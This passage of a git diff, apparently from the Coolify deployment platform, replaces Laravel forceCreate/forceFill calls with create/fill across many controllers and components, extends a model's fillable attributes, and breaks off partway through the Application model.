 app/Actions/Fortify/ResetUserPassword.php     |    2 +-
 app/Actions/Fortify/UpdateUserPassword.php    |    2 +-
 .../Fortify/UpdateUserProfileInformation.php  |    4 +-
 app/Actions/Server/InstallDocker.php          |    2 +-
 app/Console/Commands/Emails.php               |    2 +-
 .../Controllers/Api/ProjectController.php     |    2 +-
 .../Controllers/Api/ServicesController.php    |    2 +-
 app/Http/Controllers/Webhook/Bitbucket.php    |    4 +-
 app/Http/Controllers/Webhook/Gitea.php        |    4 +-
 app/Http/Controllers/Webhook/Gitlab.php       |    4 +-
 app/Jobs/ProcessGithubPullRequestWebhook.php  |    4 +-
 app/Livewire/Boarding/Index.php               |    2 +-
 app/Livewire/Destination/New/Docker.php       |    4 +-
 app/Livewire/ForcePasswordReset.php           |    2 +-
 app/Livewire/Project/AddEmpty.php             |    2 +-
 app/Livewire/Project/Application/Previews.php |    6 +-
 app/Livewire/Project/CloneMe.php              |   32 +-
 app/Livewire/Project/New/DockerCompose.php    |    2 +-
 app/Livewire/Project/New/DockerImage.php      |    2 +-
 app/Livewire/Project/New/EmptyProject.php     |    2 +-
 .../Project/New/GithubPrivateRepository.php   |    2 +-
 .../New/GithubPrivateRepositoryDeployKey.php  |    2 +-
 .../Project/New/PublicGitRepository.php       |    4 +-
 app/Livewire/Project/New/SimpleDockerfile.php |    2 +-
 app/Livewire/Project/Resource/Create.php      |    2 +-
 .../Project/Shared/ResourceOperations.php     |   26 +-
 app/Livewire/Project/Show.php                 |    2 +-
 app/Livewire/Server/Destinations.php          |    4 +-
 app/Models/Application.php                    |   12 +-
 app/Models/ApplicationDeploymentQueue.php     |    1 +
 app/Models/ApplicationPreview.php             |    3 +-
 app/Models/ApplicationSetting.php             |    1 +
 app/Models/CloudProviderToken.php             |    1 +
 app/Models/Environment.php                    |    2 +
 app/Models/GithubApp.php                      |    2 +
 app/Models/Project.php                        |    6 +-
 app/Models/ProjectSetting.php                 |    4 +-
 app/Models/ScheduledDatabaseBackup.php        |    2 +
 .../ScheduledDatabaseBackupExecution.php      |    2 +
 app/Models/ScheduledTask.php                  |    4 +
 app/Models/ScheduledTaskExecution.php         |    1 +
 app/Models/Server.php                         |    3 +-
 app/Models/ServerSetting.php                  |    1 +
 app/Models/Service.php                        |    5 +
 app/Models/ServiceApplication.php             |    3 +-
 app/Models/ServiceDatabase.php                |    3 +-
 app/Models/StandaloneClickhouse.php           |    6 +-
 app/Models/StandaloneDocker.php               |    1 +
 app/Models/StandaloneDragonfly.php            |    6 +-
 app/Models/StandaloneKeydb.php                |    6 +-
 app/Models/StandaloneMariadb.php              |    6 +-
 app/Models/StandaloneMongodb.php              |    6 +-
 app/Models/StandaloneMysql.php                |    6 +-
 app/Models/StandalonePostgresql.php           |    6 +-
 app/Models/StandaloneRedis.php                |    6 +-
 app/Models/Subscription.php                   |    1 +
 app/Models/SwarmDocker.php                    |    1 +
 app/Models/Tag.php                            |    1 +
 app/Models/User.php                           |    5 +-
 bootstrap/helpers/applications.php            |   16 +-
 bootstrap/helpers/parsers.php                 |    4 +-
 bootstrap/helpers/shared.php                  |    8 +-
 .../Feature/ApplicationHealthCheckApiTest.php |    2 +-
 tests/Feature/ApplicationRollbackTest.php     |    2 +-
 .../Feature/ClonePersistentVolumeUuidTest.php |    8 +-
 tests/Feature/ComposePreviewFqdnTest.php      |    6 +-
 .../DatabaseEnvironmentVariableApiTest.php    |    2 +-
 .../DatabasePublicPortTimeoutApiTest.php      |    8 +-
 .../Feature/DatabaseSslStatusRefreshTest.php  |    4 +-
 tests/Feature/GetLogsCommandInjectionTest.php |    4 +-
 tests/Feature/GithubPrivateRepositoryTest.php |    2 +-
 ...nternalModelCreationMassAssignmentTest.php |    4 +-
 tests/Feature/ModelFillableCreationTest.php   | 1114 +++++++++++++++++
 tests/Feature/ServiceDatabaseTeamTest.php     |   16 +-
 tests/Feature/StorageApiTest.php              |    2 +-
 tests/Unit/GitRefValidationTest.php           |   18 +-
 tests/Unit/ModelFillableRegressionTest.php    |   76 ++
 tests/Unit/ServiceParserImageUpdateTest.php   |    8 +-
 tests/v4/Browser/DashboardTest.php            |    6 +-
 79 files changed, 1411 insertions(+), 142 deletions(-)
 create mode 100644 tests/Feature/ModelFillableCreationTest.php
 create mode 100644 tests/Unit/ModelFillableRegressionTest.php

diff --git a/app/Actions/Fortify/ResetUserPassword.php b/app/Actions/Fortify/ResetUserPassword.php
index 158996c90..5baa8b7ed 100644
--- a/app/Actions/Fortify/ResetUserPassword.php
+++ b/app/Actions/Fortify/ResetUserPassword.php
@@ -21,7 +21,7 @@ public function reset(User $user, array $input): void
             'password' => ['required', Password::defaults(), 'confirmed'],
         ])->validate();
 
-        $user->forceFill([
+        $user->fill([
             'password' => Hash::make($input['password']),
         ])->save();
         $user->deleteAllSessions();
diff --git a/app/Actions/Fortify/UpdateUserPassword.php b/app/Actions/Fortify/UpdateUserPassword.php
index 0c51ec56d..320eede0b 100644
--- a/app/Actions/Fortify/UpdateUserPassword.php
+++ b/app/Actions/Fortify/UpdateUserPassword.php
@@ -24,7 +24,7 @@ public function update(User $user, array $input): void
             'current_password.current_password' => __('The provided password does not match your current password.'),
         ])->validateWithBag('updatePassword');
 
-        $user->forceFill([
+        $user->fill([
             'password' => Hash::make($input['password']),
         ])->save();
     }
diff --git a/app/Actions/Fortify/UpdateUserProfileInformation.php b/app/Actions/Fortify/UpdateUserProfileInformation.php
index c8bfd930a..76c6c0736 100644
--- a/app/Actions/Fortify/UpdateUserProfileInformation.php
+++ b/app/Actions/Fortify/UpdateUserProfileInformation.php
@@ -35,7 +35,7 @@ public function update(User $user, array $input): void
         ) {
             $this->updateVerifiedUser($user, $input);
         } else {
-            $user->forceFill([
+            $user->fill([
                 'name' => $input['name'],
                 'email' => $input['email'],
             ])->save();
@@ -49,7 +49,7 @@ public function update(User $user, array $input): void
      */
     protected function updateVerifiedUser(User $user, array $input): void
     {
-        $user->forceFill([
+        $user->fill([
             'name' => $input['name'],
             'email' => $input['email'],
             'email_verified_at' => null,
diff --git a/app/Actions/Server/InstallDocker.php b/app/Actions/Server/InstallDocker.php
index 8bb85c7fc..2e08ec6ad 100644
--- a/app/Actions/Server/InstallDocker.php
+++ b/app/Actions/Server/InstallDocker.php
@@ -49,7 +49,7 @@ public function handle(Server $server)
           }');
         $found = StandaloneDocker::where('server_id', $server->id);
         if ($found->count() == 0 && $server->id) {
-            StandaloneDocker::forceCreate([
+            StandaloneDocker::create([
                 'name' => 'coolify',
                 'network' => 'coolify',
                 'server_id' => $server->id,
diff --git a/app/Console/Commands/Emails.php b/app/Console/Commands/Emails.php
index 462155142..43ba06804 100644
--- a/app/Console/Commands/Emails.php
+++ b/app/Console/Commands/Emails.php
@@ -136,7 +136,7 @@ public function handle()
                 $application = Application::all()->first();
                 $preview = ApplicationPreview::all()->first();
                 if (! $preview) {
-                    $preview = ApplicationPreview::forceCreate([
+                    $preview = ApplicationPreview::create([
                         'application_id' => $application->id,
                         'pull_request_id' => 1,
                         'pull_request_html_url' => 'http://example.com',
diff --git a/app/Http/Controllers/Api/ProjectController.php b/app/Http/Controllers/Api/ProjectController.php
index c8638be0d..ec2e300ff 100644
--- a/app/Http/Controllers/Api/ProjectController.php
+++ b/app/Http/Controllers/Api/ProjectController.php
@@ -258,7 +258,7 @@ public function create_project(Request $request)
             ], 422);
         }
 
-        $project = Project::forceCreate([
+        $project = Project::create([
             'name' => $request->name,
             'description' => $request->description,
             'team_id' => $teamId,
diff --git a/app/Http/Controllers/Api/ServicesController.php b/app/Http/Controllers/Api/ServicesController.php
index 6a742fe1b..fbf4b9e56 100644
--- a/app/Http/Controllers/Api/ServicesController.php
+++ b/app/Http/Controllers/Api/ServicesController.php
@@ -432,7 +432,7 @@ public function create_service(Request $request)
                 if (in_array($oneClickServiceName, NEEDS_TO_CONNECT_TO_PREDEFINED_NETWORK)) {
                     data_set($servicePayload, 'connect_to_docker_network', true);
                 }
-                $service = Service::forceCreate($servicePayload);
+                $service = Service::create($servicePayload);
                 $service->name = $request->name ?? "$oneClickServiceName-".$service->uuid;
                 $service->description = $request->description;
                 if ($request->has('is_container_label_escape_enabled')) {
diff --git a/app/Http/Controllers/Webhook/Bitbucket.php b/app/Http/Controllers/Webhook/Bitbucket.php
index e59bc6ead..183186711 100644
--- a/app/Http/Controllers/Webhook/Bitbucket.php
+++ b/app/Http/Controllers/Webhook/Bitbucket.php
@@ -119,7 +119,7 @@ public function manual(Request $request)
                         $found = ApplicationPreview::where('application_id', $application->id)->where('pull_request_id', $pull_request_id)->first();
                         if (! $found) {
                             if ($application->build_pack === 'dockercompose') {
-                                $pr_app = ApplicationPreview::forceCreate([
+                                $pr_app = ApplicationPreview::create([
                                     'git_type' => 'bitbucket',
                                     'application_id' => $application->id,
                                     'pull_request_id' => $pull_request_id,
@@ -128,7 +128,7 @@ public function manual(Request $request)
                                 ]);
                                 $pr_app->generate_preview_fqdn_compose();
                             } else {
-                                $pr_app = ApplicationPreview::forceCreate([
+                                $pr_app = ApplicationPreview::create([
                                     'git_type' => 'bitbucket',
                                     'application_id' => $application->id,
                                     'pull_request_id' => $pull_request_id,
diff --git a/app/Http/Controllers/Webhook/Gitea.php b/app/Http/Controllers/Webhook/Gitea.php
index 6ba4b33cf..a9d65eae6 100644
--- a/app/Http/Controllers/Webhook/Gitea.php
+++ b/app/Http/Controllers/Webhook/Gitea.php
@@ -144,7 +144,7 @@ public function manual(Request $request)
                             $found = ApplicationPreview::where('application_id', $application->id)->where('pull_request_id', $pull_request_id)->first();
                             if (! $found) {
                                 if ($application->build_pack === 'dockercompose') {
-                                    $pr_app = ApplicationPreview::forceCreate([
+                                    $pr_app = ApplicationPreview::create([
                                         'git_type' => 'gitea',
                                         'application_id' => $application->id,
                                         'pull_request_id' => $pull_request_id,
@@ -153,7 +153,7 @@ public function manual(Request $request)
                                     ]);
                                     $pr_app->generate_preview_fqdn_compose();
                                 } else {
-                                    $pr_app = ApplicationPreview::forceCreate([
+                                    $pr_app = ApplicationPreview::create([
                                         'git_type' => 'gitea',
                                         'application_id' => $application->id,
                                         'pull_request_id' => $pull_request_id,
diff --git a/app/Http/Controllers/Webhook/Gitlab.php b/app/Http/Controllers/Webhook/Gitlab.php
index fe4f17d9e..08e5d7162 100644
--- a/app/Http/Controllers/Webhook/Gitlab.php
+++ b/app/Http/Controllers/Webhook/Gitlab.php
@@ -177,7 +177,7 @@ public function manual(Request $request)
                             $found = ApplicationPreview::where('application_id', $application->id)->where('pull_request_id', $pull_request_id)->first();
                             if (! $found) {
                                 if ($application->build_pack === 'dockercompose') {
-                                    $pr_app = ApplicationPreview::forceCreate([
+                                    $pr_app = ApplicationPreview::create([
                                         'git_type' => 'gitlab',
                                         'application_id' => $application->id,
                                         'pull_request_id' => $pull_request_id,
@@ -186,7 +186,7 @@ public function manual(Request $request)
                                     ]);
                                     $pr_app->generate_preview_fqdn_compose();
                                 } else {
-                                    $pr_app = ApplicationPreview::forceCreate([
+                                    $pr_app = ApplicationPreview::create([
                                         'git_type' => 'gitlab',
                                         'application_id' => $application->id,
                                         'pull_request_id' => $pull_request_id,
diff --git a/app/Jobs/ProcessGithubPullRequestWebhook.php b/app/Jobs/ProcessGithubPullRequestWebhook.php
index 01a512439..041cd812c 100644
--- a/app/Jobs/ProcessGithubPullRequestWebhook.php
+++ b/app/Jobs/ProcessGithubPullRequestWebhook.php
@@ -118,7 +118,7 @@ private function handleOpenAction(Application $application, ?GithubApp $githubAp
 
         if (! $found) {
             if ($application->build_pack === 'dockercompose') {
-                $preview = ApplicationPreview::forceCreate([
+                $preview = ApplicationPreview::create([
                     'git_type' => 'github',
                     'application_id' => $application->id,
                     'pull_request_id' => $this->pullRequestId,
@@ -127,7 +127,7 @@ private function handleOpenAction(Application $application, ?GithubApp $githubAp
                 ]);
                 $preview->generate_preview_fqdn_compose();
             } else {
-                $preview = ApplicationPreview::forceCreate([
+                $preview = ApplicationPreview::create([
                     'git_type' => 'github',
                     'application_id' => $application->id,
                     'pull_request_id' => $this->pullRequestId,
diff --git a/app/Livewire/Boarding/Index.php b/app/Livewire/Boarding/Index.php
index 170f0cdea..33c75bf70 100644
--- a/app/Livewire/Boarding/Index.php
+++ b/app/Livewire/Boarding/Index.php
@@ -441,7 +441,7 @@ public function selectExistingProject()
 
     public function createNewProject()
     {
-        $this->createdProject = Project::forceCreate([
+        $this->createdProject = Project::create([
             'name' => 'My first project',
             'team_id' => currentTeam()->id,
             'uuid' => (string) new Cuid2,
diff --git a/app/Livewire/Destination/New/Docker.php b/app/Livewire/Destination/New/Docker.php
index 141235590..6f9b6f995 100644
--- a/app/Livewire/Destination/New/Docker.php
+++ b/app/Livewire/Destination/New/Docker.php
@@ -77,7 +77,7 @@ public function submit()
                 if ($found) {
                     throw new \Exception('Network already added to this server.');
                 } else {
-                    $docker = SwarmDocker::forceCreate([
+                    $docker = SwarmDocker::create([
                         'name' => $this->name,
                         'network' => $this->network,
                         'server_id' => $this->selectedServer->id,
@@ -88,7 +88,7 @@ public function submit()
                 if ($found) {
                     throw new \Exception('Network already added to this server.');
                 } else {
-                    $docker = StandaloneDocker::forceCreate([
+                    $docker = StandaloneDocker::create([
                         'name' => $this->name,
                         'network' => $this->network,
                         'server_id' => $this->selectedServer->id,
diff --git a/app/Livewire/ForcePasswordReset.php b/app/Livewire/ForcePasswordReset.php
index 61a2a20e9..e6392497f 100644
--- a/app/Livewire/ForcePasswordReset.php
+++ b/app/Livewire/ForcePasswordReset.php
@@ -48,7 +48,7 @@ public function submit()
             $this->rateLimit(10);
             $this->validate();
             $firstLogin = auth()->user()->created_at == auth()->user()->updated_at;
-            auth()->user()->forceFill([
+            auth()->user()->fill([
                 'password' => Hash::make($this->password),
                 'force_password_reset' => false,
             ])->save();
diff --git a/app/Livewire/Project/AddEmpty.php b/app/Livewire/Project/AddEmpty.php
index a2581a5c9..974f0608a 100644
--- a/app/Livewire/Project/AddEmpty.php
+++ b/app/Livewire/Project/AddEmpty.php
@@ -30,7 +30,7 @@ public function submit()
     {
         try {
             $this->validate();
-            $project = Project::forceCreate([
+            $project = Project::create([
                 'name' => $this->name,
                 'description' => $this->description,
                 'team_id' => currentTeam()->id,
diff --git a/app/Livewire/Project/Application/Previews.php b/app/Livewire/Project/Application/Previews.php
index c61a4e4a7..c887e9b83 100644
--- a/app/Livewire/Project/Application/Previews.php
+++ b/app/Livewire/Project/Application/Previews.php
@@ -196,7 +196,7 @@ public function add(int $pull_request_id, ?string $pull_request_html_url = null,
                 $this->setDeploymentUuid();
                 $found = ApplicationPreview::where('application_id', $this->application->id)->where('pull_request_id', $pull_request_id)->first();
                 if (! $found && ! is_null($pull_request_html_url)) {
-                    $found = ApplicationPreview::forceCreate([
+                    $found = ApplicationPreview::create([
                         'application_id' => $this->application->id,
                         'pull_request_id' => $pull_request_id,
                         'pull_request_html_url' => $pull_request_html_url,
@@ -210,7 +210,7 @@ public function add(int $pull_request_id, ?string $pull_request_html_url = null,
                 $this->setDeploymentUuid();
                 $found = ApplicationPreview::where('application_id', $this->application->id)->where('pull_request_id', $pull_request_id)->first();
                 if (! $found && (! is_null($pull_request_html_url) || ($this->application->build_pack === 'dockerimage' && str($docker_registry_image_tag)->isNotEmpty()))) {
-                    $found = ApplicationPreview::forceCreate([
+                    $found = ApplicationPreview::create([
                         'application_id' => $this->application->id,
                         'pull_request_id' => $pull_request_id,
                         'pull_request_html_url' => $pull_request_html_url ?? '',
@@ -262,7 +262,7 @@ public function deploy(int $pull_request_id, ?string $pull_request_html_url = nu
             $this->setDeploymentUuid();
             $found = ApplicationPreview::where('application_id', $this->application->id)->where('pull_request_id', $pull_request_id)->first();
             if (! $found && (! is_null($pull_request_html_url) || ($this->application->build_pack === 'dockerimage' && str($docker_registry_image_tag)->isNotEmpty()))) {
-                $found = ApplicationPreview::forceCreate([
+                $found = ApplicationPreview::create([
                     'application_id' => $this->application->id,
                     'pull_request_id' => $pull_request_id,
                     'pull_request_html_url' => $pull_request_html_url ?? '',
diff --git a/app/Livewire/Project/CloneMe.php b/app/Livewire/Project/CloneMe.php
index 93eb2a78c..644753c83 100644
--- a/app/Livewire/Project/CloneMe.php
+++ b/app/Livewire/Project/CloneMe.php
@@ -100,7 +100,7 @@ public function clone(string $type)
                 if ($foundProject) {
                     throw new \Exception('Project with the same name already exists.');
                 }
-                $project = Project::forceCreate([
+                $project = Project::create([
                     'name' => $this->newName,
                     'team_id' => currentTeam()->id,
                     'description' => $this->project->description.' (clone)',
@@ -139,7 +139,7 @@ public function clone(string $type)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->forceFill([
+                ])->fill([
                     'uuid' => $uuid,
                     'status' => 'exited',
                     'started_at' => null,
@@ -188,7 +188,7 @@ public function clone(string $type)
                         'created_at',
                         'updated_at',
                         'uuid',
-                    ])->forceFill([
+                    ])->fill([
                         'name' => $newName,
                         'resource_id' => $newDatabase->id,
                     ]);
@@ -217,7 +217,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->forceFill([
+                    ])->fill([
                         'resource_id' => $newDatabase->id,
                     ]);
                     $newStorage->save();
@@ -230,7 +230,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->forceFill([
+                    ])->fill([
                         'uuid' => $uuid,
                         'database_id' => $newDatabase->id,
                         'database_type' => $newDatabase->getMorphClass(),
@@ -248,7 +248,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->forceFill($payload);
+                    ])->fill($payload);
                     $newEnvironmentVariable->save();
                 }
             }
@@ -259,7 +259,7 @@ public function clone(string $type)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->forceFill([
+                ])->fill([
                     'uuid' => $uuid,
                     'environment_id' => $environment->id,
                     'destination_id' => $this->selectedDestination,
@@ -277,7 +277,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->forceFill([
+                    ])->fill([
                         'uuid' => (string) new Cuid2,
                         'service_id' => $newService->id,
                         'team_id' => currentTeam()->id,
@@ -291,7 +291,7 @@ public function clone(string $type)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->forceFill([
+                    ])->fill([
                         'resourceable_id' => $newService->id,
                         'resourceable_type' => $newService->getMorphClass(),
                     ]);
@@ -299,7 +299,7 @@ public function clone(string $type)
                 }
 
                 foreach ($newService->applications() as $application) {
-                    $application->forceFill([
+                    $application->fill([
                         'status' => 'exited',
                     ])->save();
 
@@ -317,7 +317,7 @@ public function clone(string $type)
                             'created_at',
                             'updated_at',
                             'uuid',
-                        ])->forceFill([
+                        ])->fill([
                             'name' => $newName,
                             'resource_id' => $application->id,
                         ]);
@@ -346,7 +346,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->forceFill([
+                        ])->fill([
                             'resource_id' => $application->id,
                         ]);
                         $newStorage->save();
@@ -354,7 +354,7 @@ public function clone(string $type)
                 }
 
                 foreach ($newService->databases() as $database) {
-                    $database->forceFill([
+                    $database->fill([
                         'status' => 'exited',
                     ])->save();
 
@@ -372,7 +372,7 @@ public function clone(string $type)
                             'created_at',
                             'updated_at',
                             'uuid',
-                        ])->forceFill([
+                        ])->fill([
                             'name' => $newName,
                             'resource_id' => $database->id,
                         ]);
@@ -401,7 +401,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->forceFill([
+                        ])->fill([
                             'resource_id' => $database->id,
                         ]);
                         $newStorage->save();
@@ -414,7 +414,7 @@ public function clone(string $type)
                             'id',
                             'created_at',
                             'updated_at',
-                        ])->forceFill([
+                        ])->fill([
                             'uuid' => $uuid,
                             'database_id' => $database->id,
                             'database_type' => $database->getMorphClass(),
diff --git a/app/Livewire/Project/New/DockerCompose.php b/app/Livewire/Project/New/DockerCompose.php
index 99fb2efc4..2b92902c6 100644
--- a/app/Livewire/Project/New/DockerCompose.php
+++ b/app/Livewire/Project/New/DockerCompose.php
@@ -54,7 +54,7 @@ public function submit()
             }
             $destination_class = $destination->getMorphClass();
 
-            $service = Service::forceCreate([
+            $service = Service::create([
                 'docker_compose_raw' => $this->dockerComposeRaw,
                 'environment_id' => $environment->id,
                 'server_id' => (int) $server_id,
diff --git a/app/Livewire/Project/New/DockerImage.php b/app/Livewire/Project/New/DockerImage.php
index 8becdf585..268333d07 100644
--- a/app/Livewire/Project/New/DockerImage.php
+++ b/app/Livewire/Project/New/DockerImage.php
@@ -133,7 +133,7 @@ public function submit()
         // Determine the image tag based on whether it's a hash or regular tag
         $imageTag = $parser->isImageHash() ? 'sha256-'.$parser->getTag() : $parser->getTag();
 
-        $application = Application::forceCreate([
+        $application = Application::create([
             'name' => 'docker-image-'.new Cuid2,
             'repository_project_id' => 0,
             'git_repository' => 'coollabsio/coolify',
diff --git a/app/Livewire/Project/New/EmptyProject.php b/app/Livewire/Project/New/EmptyProject.php
index 1cdc7e098..0360365a9 100644
--- a/app/Livewire/Project/New/EmptyProject.php
+++ b/app/Livewire/Project/New/EmptyProject.php
@@ -10,7 +10,7 @@ class EmptyProject extends Component
 {
     public function createEmptyProject()
     {
-        $project = Project::forceCreate([
+        $project = Project::create([
             'name' => generate_random_name(),
             'team_id' => currentTeam()->id,
             'uuid' => (string) new Cuid2,
diff --git a/app/Livewire/Project/New/GithubPrivateRepository.php b/app/Livewire/Project/New/GithubPrivateRepository.php
index 9d4acb9bb..0222008b0 100644
--- a/app/Livewire/Project/New/GithubPrivateRepository.php
+++ b/app/Livewire/Project/New/GithubPrivateRepository.php
@@ -191,7 +191,7 @@ public function submit()
             $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->firstOrFail();
             $environment = $project->environments()->where('uuid', $this->parameters['environment_uuid'])->firstOrFail();
 
-            $application = Application::forceCreate([
+            $application = Application::create([
                 'name' => generate_application_name($this->selected_repository_owner.'/'.$this->selected_repository_repo, $this->selected_branch_name),
                 'repository_project_id' => $this->selected_repository_id,
                 'git_repository' => str($this->selected_repository_owner)->trim()->toString().'/'.str($this->selected_repository_repo)->trim()->toString(),
diff --git a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
index ba058c6ff..f8642d6fc 100644
--- a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
+++ b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
@@ -183,7 +183,7 @@ public function submit()
                 $application_init['docker_compose_location'] = $this->docker_compose_location;
                 $application_init['base_directory'] = $this->base_directory;
             }
-            $application = Application::forceCreate($application_init);
+            $application = Application::create($application_init);
             $application->settings->is_static = $this->is_static;
             $application->settings->save();
 
diff --git a/app/Livewire/Project/New/PublicGitRepository.php b/app/Livewire/Project/New/PublicGitRepository.php
index 6bd71d246..62ac7ec0d 100644
--- a/app/Livewire/Project/New/PublicGitRepository.php
+++ b/app/Livewire/Project/New/PublicGitRepository.php
@@ -299,7 +299,7 @@ public function submit()
                     $new_service['source_id'] = $this->git_source->id;
                     $new_service['source_type'] = $this->git_source->getMorphClass();
                 }
-                $service = Service::forceCreate($new_service);
+                $service = Service::create($new_service);
 
                 return redirect()->route('project.service.configuration', [
                     'service_uuid' => $service->uuid,
@@ -346,7 +346,7 @@ public function submit()
                 $application_init['docker_compose_location'] = $this->docker_compose_location;
                 $application_init['base_directory'] = $this->base_directory;
             }
-            $application = Application::forceCreate($application_init);
+            $application = Application::create($application_init);
 
             $application->settings->is_static = $this->isStatic;
             $application->settings->save();
diff --git a/app/Livewire/Project/New/SimpleDockerfile.php b/app/Livewire/Project/New/SimpleDockerfile.php
index 400b58fea..1073157e6 100644
--- a/app/Livewire/Project/New/SimpleDockerfile.php
+++ b/app/Livewire/Project/New/SimpleDockerfile.php
@@ -52,7 +52,7 @@ public function submit()
         if (! $port) {
             $port = 80;
         }
-        $application = Application::forceCreate([
+        $application = Application::create([
             'name' => 'dockerfile-'.new Cuid2,
             'repository_project_id' => 0,
             'git_repository' => 'coollabsio/coolify',
diff --git a/app/Livewire/Project/Resource/Create.php b/app/Livewire/Project/Resource/Create.php
index dbe56b079..966c66a14 100644
--- a/app/Livewire/Project/Resource/Create.php
+++ b/app/Livewire/Project/Resource/Create.php
@@ -91,7 +91,7 @@ public function mount()
                     if (in_array($oneClickServiceName, NEEDS_TO_CONNECT_TO_PREDEFINED_NETWORK)) {
                         data_set($service_payload, 'connect_to_docker_network', true);
                     }
-                    $service = Service::forceCreate($service_payload);
+                    $service = Service::create($service_payload);
                     $service->name = "$oneClickServiceName-".$service->uuid;
                     $service->save();
                     if ($oneClickDotEnvs?->count() > 0) {
diff --git a/app/Livewire/Project/Shared/ResourceOperations.php b/app/Livewire/Project/Shared/ResourceOperations.php
index 301c51be9..f4813dd4c 100644
--- a/app/Livewire/Project/Shared/ResourceOperations.php
+++ b/app/Livewire/Project/Shared/ResourceOperations.php
@@ -94,7 +94,7 @@ public function cloneTo($destination_id)
                 'id',
                 'created_at',
                 'updated_at',
-            ])->forceFill([
+            ])->fill([
                 'uuid' => $uuid,
                 'name' => $this->resource->name.'-clone-'.$uuid,
                 'status' => 'exited',
@@ -143,7 +143,7 @@ public function cloneTo($destination_id)
                     'created_at',
                     'updated_at',
                     'uuid',
-                ])->forceFill([
+                ])->fill([
                     'name' => $newName,
                     'resource_id' => $new_resource->id,
                 ]);
@@ -172,7 +172,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->forceFill([
+                ])->fill([
                     'resource_id' => $new_resource->id,
                 ]);
                 $newStorage->save();
@@ -185,7 +185,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->forceFill([
+                ])->fill([
                     'uuid' => $uuid,
                     'database_id' => $new_resource->id,
                     'database_type' => $new_resource->getMorphClass(),
@@ -204,7 +204,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->forceFill($payload);
+                ])->fill($payload);
                 $newEnvironmentVariable->save();
             }
 
@@ -221,7 +221,7 @@ public function cloneTo($destination_id)
                 'id',
                 'created_at',
                 'updated_at',
-            ])->forceFill([
+            ])->fill([
                 'uuid' => $uuid,
                 'name' => $this->resource->name.'-clone-'.$uuid,
                 'destination_id' => $new_destination->id,
@@ -242,7 +242,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->forceFill([
+                ])->fill([
                     'uuid' => (string) new Cuid2,
                     'service_id' => $new_resource->id,
                     'team_id' => currentTeam()->id,
@@ -256,7 +256,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->forceFill([
+                ])->fill([
                     'resourceable_id' => $new_resource->id,
                     'resourceable_type' => $new_resource->getMorphClass(),
                 ]);
@@ -264,7 +264,7 @@ public function cloneTo($destination_id)
             }
 
             foreach ($new_resource->applications() as $application) {
-                $application->forceFill([
+                $application->fill([
                     'status' => 'exited',
                 ])->save();
 
@@ -282,7 +282,7 @@ public function cloneTo($destination_id)
                         'created_at',
                         'updated_at',
                         'uuid',
-                    ])->forceFill([
+                    ])->fill([
                         'name' => $newName,
                         'resource_id' => $application->id,
                     ]);
@@ -307,7 +307,7 @@ public function cloneTo($destination_id)
             }
 
             foreach ($new_resource->databases() as $database) {
-                $database->forceFill([
+                $database->fill([
                     'status' => 'exited',
                 ])->save();
 
@@ -325,7 +325,7 @@ public function cloneTo($destination_id)
                         'created_at',
                         'updated_at',
                         'uuid',
-                    ])->forceFill([
+                    ])->fill([
                         'name' => $newName,
                         'resource_id' => $database->id,
                     ]);
@@ -366,7 +366,7 @@ public function moveTo($environment_id)
         try {
             $this->authorize('update', $this->resource);
             $new_environment = Environment::ownedByCurrentTeam()->findOrFail($environment_id);
-            $this->resource->forceFill([
+            $this->resource->fill([
                 'environment_id' => $environment_id,
             ])->save();
             if ($this->resource->type() === 'application') {
diff --git a/app/Livewire/Project/Show.php b/app/Livewire/Project/Show.php
index b9628dd0d..e884abb4e 100644
--- a/app/Livewire/Project/Show.php
+++ b/app/Livewire/Project/Show.php
@@ -42,7 +42,7 @@ public function submit()
     {
         try {
             $this->validate();
-            $environment = Environment::forceCreate([
+            $environment = Environment::create([
                 'name' => $this->name,
                 'project_id' => $this->project->id,
                 'uuid' => (string) new Cuid2,
diff --git a/app/Livewire/Server/Destinations.php b/app/Livewire/Server/Destinations.php
index f41ca00f3..117b43ad6 100644
--- a/app/Livewire/Server/Destinations.php
+++ b/app/Livewire/Server/Destinations.php
@@ -43,7 +43,7 @@ public function add($name)
 
                 return;
             } else {
-                SwarmDocker::forceCreate([
+                SwarmDocker::create([
                     'name' => $this->server->name.'-'.$name,
                     'network' => $this->name,
                     'server_id' => $this->server->id,
@@ -57,7 +57,7 @@ public function add($name)
 
                 return;
             } else {
-                StandaloneDocker::forceCreate([
+                StandaloneDocker::create([
                     'name' => $this->server->name.'-'.$name,
                     'network' => $name,
                     'server_id' => $this->server->id,
diff --git a/app/Models/Application.php b/app/Models/Application.php
index bdc76eb33..fef6f6e4c 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -203,6 +203,14 @@ class Application extends BaseModel
         'restart_count',
         'last_restart_at',
         'last_restart_type',
+        'uuid',
+        'environment_id',
+        'destination_id',
+        'destination_type',
+        'source_id',
+        'source_type',
+        'repository_project_id',
+        'private_key_id',
     ];
 
     protected $appends = ['server_status'];
@@ -262,7 +270,7 @@ protected static function booted()
                 }
             }
             if (count($payload) > 0) {
-                $application->forceFill($payload);
+                $application->fill($payload);
             }
 
             // Buildpack switching cleanup logic
@@ -299,7 +307,7 @@ protected static function booted()
             }
         });
         static::created(function ($application) {
